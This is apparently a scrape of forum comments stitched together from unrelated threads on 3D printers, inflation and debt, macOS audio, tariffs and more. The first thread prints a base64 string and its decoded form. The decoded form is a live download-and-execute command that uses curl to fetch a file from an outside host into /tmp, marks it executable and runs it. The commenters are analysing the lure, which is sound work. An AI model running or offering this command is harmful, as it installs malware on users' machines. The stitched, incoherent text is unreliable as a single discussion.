10cent beer night is up there with this one https://www.youtube.com/watch?v=VxTtzLUteDA

He asked ChatGPT to run the command in a sterile environment. He knew it was a bad idea to start with. It's a quick and dirty method in case you don't have a virgin VM lying around to try random scripts on to see what they do.

I'd say something edgy about paying attention but that wouldn't be nice.

It's a bad idea to try to execute a malicious string in any environment, but the payload is just base64 text and it's safe to decode if you understand how to use the command line.

Look, I just deciphered it in Termux on my phone:

~ $ echo "Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHBzOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRjaGE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakttTVVGRVl2OEFsZktS" | base64 -d

curl -sL -o /tmp/pjKmMUFEYv8AlfKR https://www.amanagencies.com/assets/js/grecaptcha; chmod +x /tmp/pjKmMUFEYv8AlfKR; /tmp/pjKmMUFEYv8AlfKR~ $

Did ChatGPT do ANYTHING useful in this blog? No, but it probably cost more than it did when I ran base64 -d on my phone lol and if you want updoots on the Orange Site you had better mention LLMs

If I was more paranoid I could've used someone else's computer to decipher the text but I wanted to make a point.

ChatGPT doesn't run commands, does it?

That's probably bordering on a philosophical question.

Am I "running" code if follow the control flow and say "Hello World!" out loud?

It can

Geez... echo [some garble] | base64 | bash , and you'd spin up a VM to diagnose it?

I'd google a base64 decoder and paste the "[some garble]" in...

The command helpfully already tells you where you can find a base64 decoder: it's in /usr/bin/base64.

Assuming you already have a ChatGPT window handy, which many people do these days, I don't think it's any worse to paste it there and ask the LLM to decode it, and avoid the risk that you copy and pasted the "| bash" as well.

We're so close to "please drink a verification can" green text from 4chan.

Didn't we already get there with Mountain Dew [1] and Pure Kick [2]?

Makes you wonder, they can implement it now easier then ever.

Still no way to replace battery, so in 3 years tops this thing is e-waste.

That is also true of most smartphones. Smartphone batteries can be replaced, but specialty equipment and training is required. It's the same problem here, but much worse: they have to pack a significant amount of hardware into the space available. Even if they wanted to, it's unlikely that they could offer user-serviceable batteries.

TWS are better comparison. Smartphone battery need to be changed in 3-5 years and should cost < $50. People throw them away because new one is better and they have money.

As someone who started with junk printers from the very beginning, and now sell 3D prints, please don't buy a machine you have to assemble. Don't learn how to dial it in. And spend more than $1,000.

Your time and money is worth more than trying to make some open source diy kit printer do what you want. Bambu has body slammed the market with printers that work.

Get a H2S or X1C, run it in lan only mode if you're paranoid, and don't look back. H2S is a better option for your material choices.

My comment will probably get flamed because I'm not saying Prusa makes the best printers and only support open source, but do you want a tool that makes things, or do you want to waste time baby sitting your tool trying to get it to do something others can do out of the box.

I WISH my machine was open source, but the reality is it's not. It's like asking what mill to buy, but rulling out HAAS and Bridgeport because you're ok with trying to machine around crazy slop.

Yes, but with a caveat.

Here in Elbonia H2S costs 5 times the price of Elegoo Centauri.

I know that poor people save money twice, but I think it's also responsible, if you're just treading the water, to get a decent toy and see if that's really something for you.

Recently my gf thought about getting a drawing tablet. Of course I immediately aimed for professional graphic tablet, at least 19". Fortunately we ended up buying cheap Huion [1] and after having a blast with Rebelle for a month it turned out it's not for us. We saved a ton of money in the process and maybe one day I'll decide that the money saved will finance a toy 3D printer. :)

[1] I'm not an artist but I've worked in digital agencies for half of my life and I was blown away by the quality of Huion compared to Wacom. I think it might be similar to some of 3D printers mentioned here.

You can't exactly charge back the AppStore because you risk losing your entire account. I'd much prefer every app be billed separately because then I CAN request a charge back, without fear of literally losing my entire phone, house access, etc.

Your definition of good, is my definition of a prison.

Gold, make sure your debts are low, trim expenses now. Start thinking long term, what things will you need 5-10 years from now that will only be much more expensive or hard to get.

If we are heading into a period of high inflation and interest rates, holding debt now is great. High unexpected inflation means that the dollars that you use to pay off the debt are worth less, and you are locked in to a low interest rate.

> and you are locked in to a low interest rate.

Depends on the type of debt, of course. If it's a fixed term loan, and you'll definitely never need to refinance it, sure.

The ideal circumstance would be to take out a loan you can’t really afford immediately before a round of hyperinflation. Bad time to have $100K in a savings account. Great time to owe that bank $2M.

I currently am this person.

What exactly would one do with a 2 million dollar loan? Please don’t say real estate.

Outside of the standard theme park with blackjack and hookers, you could pick up a race horse. Those can start in the low six figures up to tens of millions. Although if you want to race, do not blow the entire amount on just the horse, because the training + food + maintenance is also going to have some hefty bills.

I’ve never been to a theme park with black jack and hookers. I’ll let you sort that out.

Thanks for the help.

That’s all I’ve got. Maybe open a business, I suppose?

I’ll just let it deprecate.

What a mess.

you're making an assumption that your income is going to keep pace with inflation to make it easier to pay off the debt. It very well may not.

/I haven't got a base pay increase in 4 years

True, but at some point you can sell plasma for 4 trillion USD and pay it off all at once.

It's never a bad time to lower your expenses.

Gold, aka Bitcoin for Boomers.

Paid day cares probably have a big issue with this.

Maybe, but they may also get vouchers (that's what it sounds like).

I wouldn't be surprised if it encourages companies to have on-site daycare.

Probably richer taxpayers are the ones that won't like it.

You know what I really love about MacOS? Every time I pair my bluetooth headphones it defaults the microphone to that sound input. Can you disable that microphone like in Windows? Nope.

I use SoundSource because without it digital audio has audio levels locked, which is also asinine. We have to admit, audio control on Macs is straight up garbage, and having to buy third party tools to do something the other major OS does out of the box is not a good look.

> You know what I really love about MacOS? Every time I pair my bluetooth headphones it defaults the microphone to that sound input. Can you disable that microphone like in Windows? Nope.

Can you mark your microphone's headphone jack (which is only intended to be used to listen to yourself while recording) as not a thing you want to ever use? Nope.

macOS is great. Can you have a different scroll direction between scroll wheel on a mouse and the touchpad? Of course not, don't be silly.

They have teams that are dedicated to handling tariffs and imports. Smaller companies that used traditional shipping now having to jump through insane loops are just calling it quits.

Having bumped into this world via family...even small manufacturers that do substantial portion of their business overseas often have dedicated import/export people, or contract to firms that handle it. It's just smart business. I think it's the scale and the level of uncertainty that the current round of economic chicken has the SMBs hedging.
